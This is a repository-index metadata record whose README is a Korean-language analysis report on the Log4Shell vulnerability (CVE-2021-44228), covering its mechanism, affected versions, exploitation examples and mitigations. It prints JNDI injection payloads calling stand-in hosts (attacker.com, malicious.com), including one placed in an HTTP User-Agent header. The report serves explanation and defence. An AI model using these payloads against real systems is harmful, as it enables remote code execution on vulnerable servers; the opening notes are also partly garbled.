{"id":28812476,"url":"https://github.com/tpdlshdmlrkfmcla/log4shell","last_synced_at":"2026-02-02T16:08:20.147Z","repository":{"id":281949133,"uuid":"946977506","full_name":"tpdlshdmlrkfmcla/Log4shell","owner":"tpdlshdmlrkfmcla","description":"CVE-2021-44228","archived":false,"fork":false,"pushed_at":"2025-03-13T20:03:49.000Z","size":9,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-18T13:58:22.593Z","etag":null,"topics":["cve-2021-44228","log4shell"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tpdlshdmlrkfmcla.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-12T01:01:47.000Z","updated_at":"2025-03-13T20:16:58.000Z","dependencies_parsed_at":"2025-03-18T02:27:15.829Z","dependency_job_id":null,"html_url":"https://github.com/tpdlshdmlrkfmcla/Log4shell","commit_stats":null,"previous_names":["chihyeonwon/log4shell","mr-won/log4shell","user20252228/log4shell","tpdlshdmlrkfmcla/log4shell"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/tpdlshdmlrkfmcla/Log4shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tpdlshdmlrkfmcla%2FLog4shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tpdlshdmlrkfmcla%2FLog4shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tpdlshdmlrkfmcla%2FLog4shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tpdlshdmlrkfmcla%2FLog4shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tpdlshdmlrkfmcla","download_url":"https://codeload.github.com/tpdlshdmlrkfmcla/Log4shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tpdlshdmlrkfmcla%2FLog4shell/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29015145,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-02T14:58:54.169Z","status":"ssl_error","status_checked_at":"2026-02-02T14:58:51.285Z","response_time":58,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-44228","log4shell"],"created_at":"2025-06-18T14:41:03.862Z","updated_at":"2026-02-02T16:08:20.133Z","avatar_url":"https://github.com/tpdlshdmlrkfmcla.png","language":null,"readme":"이글루코퍼레이션 원치현 Log4shell 분석보고서\n\n# Log4shell\nCVE-2021-44228\nLog4j 아파치 재단의 무료오픈소스 java기반의 모든 애플가능 다양한 자바 기반 서비스 로그 기록 JDNI데이터및 객체를 발견 참고하기위한 자바 LDAP1389 Lookup JNDI를 통해 찾은 자원을 사용하는 기능\n\n취약서버 구동 도커이미지파일 다운로드\nAsudo git clone \nsudo docker build . -t vulnerable-app\n새로 생성할 이미지를 vulnerable-app으로 현재 디렉토리에 도커 이미지 build 생성\n\ngithub.com/welk\n\n미사용 취약한 서버 종료\ndocker ps -a 실행중인 도커이미지 전체 확인\ndocker container 아이디 확인\n\n# Log4Shell (CVE-2021-44228) 분석 보고서\n\n## 1. 개요\n**Log4Shell(CVE-2021-44228)**은 Apache Log4j 라이브러리에서 발견된 **원격 코드 실행(RCE, Remote Code Execution)** 취약점입니다.  \n공격자는 악성 페이로드를 이용하여 **임의의 코드를 실행**할 수 있으며, 광범위한 피해를 초래할 수 있습니다.\n\n본 보고서는 Log4Shell의 원리, 영향, 악용 사례, 탐지 및 대응 방법을 분석합니다.\n\n---\n\n## 2. 취약점 개요\n\n| 항목 | 설명 |\n|------|------|\n| **취약점명** | Log4Shell |\n| **CVE 번호** | CVE-2021-44228 |\n| **취약점 유형** | 원격 코드 실행(RCE) |\n| **영향을 받는 버전** | Log4j 2.0-beta9 ~ 2.14.1 |\n| **패치된 버전** | Log4j 2.15.0 이상 |\n| **공격 난이도** | 낮음 (간단한 문자열 입력만으로 악용 가능) |\n| **심각도** | 🔥 치명적 (CVSS 10.0) |\n\n---\n\n## 3. 취약점 원리\nLog4Shell은 **JNDI(Java Naming and Directory Interface) 룩업 기능의 취약점**을 이용하여 공격자가 원격 서버에서 악성 코드를 실행할 수 있도록 합니다.\n\n### 3.1 공격 흐름\n1. 공격자는 악성 문자열을 포함한 로그 메시지를 애플리케이션에 전달.\n2. Log4j가 로그를 기록하는 과정에서 **JNDI Lookup을 실행**.\n3. JNDI가 LDAP, RMI 등의 원격 서버에서 데이터를 조회.\n4. 공격자의 서버에서 악성 Java 클래스 로드 및 실행.\n5. **원격 코드 실행(RCE) 발생**.\n\n### 3.2 공격 코드 예제\n공격자는 다음과 같은 문자열을 로그에 남기기만 해도 취약점을 악용할 수 있습니다.\n\n```java\n${jndi:ldap://attacker.com:1389/exploit}\n4. 영향 범위\nLog4Shell 취약점은 Log4j를 사용하는 수많은 기업 및 서비스에 영향을 미쳤습니다.\n\n4.1 취약한 주요 서비스 및 시스템\n클라우드 서비스: AWS, Google Cloud, Microsoft Azure\n기업 애플리케이션: Apache Struts, ElasticSearch, VMware vCenter\n게임 서버: Minecraft, Steam\n각종 웹 애플리케이션 및 서버: Spring Boot, Tomcat 등\n5. 악용 사례 및 공격 예시\n5.1 Minecraft 서버 공격\n공격자는 Minecraft 채팅창에 다음 문자열을 입력하여 서버를 장악할 수 있었습니다.\nshell\n복사\n편집\n${jndi:ldap://attacker.com:1389/exploit}\n서버가 이를 로그에 기록하면, JNDI Lookup을 통해 공격자의 서버에서 악성 코드가 실행됨.\n5.2 웹 애플리케이션 공격\nHTTP 요청의 User-Agent, Referer, X-Forwarded-For 등 로그에 기록되는 필드에 악성 페이로드를 삽입.\n예제:\ncss\n복사\n편집\nGET / HTTP/1.1\nHost: victim.com\nUser-Agent: ${jndi:ldap://malicious.com:1389/exploit}\n6. 탐지 및 대응 방안\n6.1 취약점 탐지 방법\n✅ 보안 스캐너 활용\n\nlog4j-scan (https://github.com/fullhunt/log4j-scan)\nlog4shell-detector (https://github.com/Neo23x0/log4shell-detector)\n✅ 로그 파일 점검\n\n로그에서 ${jndi:ldap://...} 같은 패턴이 발견되면 즉시 대응 필요.\n✅ 네트워크 모니터링\n\n비정상적인 LDAP, RMI 요청이 있는지 점검.\n6.2 대응 방법\n✅ 즉시 조치\n\nLog4j 2.15.0 이상 버전으로 업그레이드.\nJava 실행 시 환경 변수 설정:\nshell\n복사\n편집\n-Dlog4j2.formatMsgNoLookups=true\n방화벽 및 IDS/IPS에서 jndi:ldap:// 패턴 차단.\n✅ 장기적인 보안 조치\n\nJNDI 사용 제한 및 보안 정책 강화.\nWAF(Web Application Firewall) 적용.\n주기적인 보안 점검 및 취약점 스캐닝 수행.\n7. 패치 및 해결 방법\nLog4j 버전\t대응 조치\n2.0-beta9 ~ 2.14.1\t취약, 업데이트 필요\n2.15.0\t기본적으로 JNDI Lookup 비활성화\n2.16.0\tJNDI 기능 완전 제거\n2.17.0\t추가적인 보안 강화 조치\n✅ 최신 버전(2.17.1 이상)으로 업데이트 권장!\n\n8. 결론\nLog4Shell(CVE-2021-44228)은 최근 몇 년간 가장 심각한 보안 취약점 중 하나로 평가됩니다.\n✅ 취약한 시스템을 신속하게 패치하고, 지속적인 보안 모니터링을 수행하는 것이 필수적입니다.\n✅ Log4j를 사용하는 모든 애플리케이션에서 보안 점검을 수행해야 합니다.\n\n9. 참고 자료\nApache Log4j 공식 보안 권고문\nNIST National Vulnerability Database (CVE-2021-44228)\nlog4j-scan (GitHub)\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftpdlshdmlrkfmcla%2Flog4shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftpdlshdmlrkfmcla%2Flog4shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftpdlshdmlrkfmcla%2Flog4shell/lists"}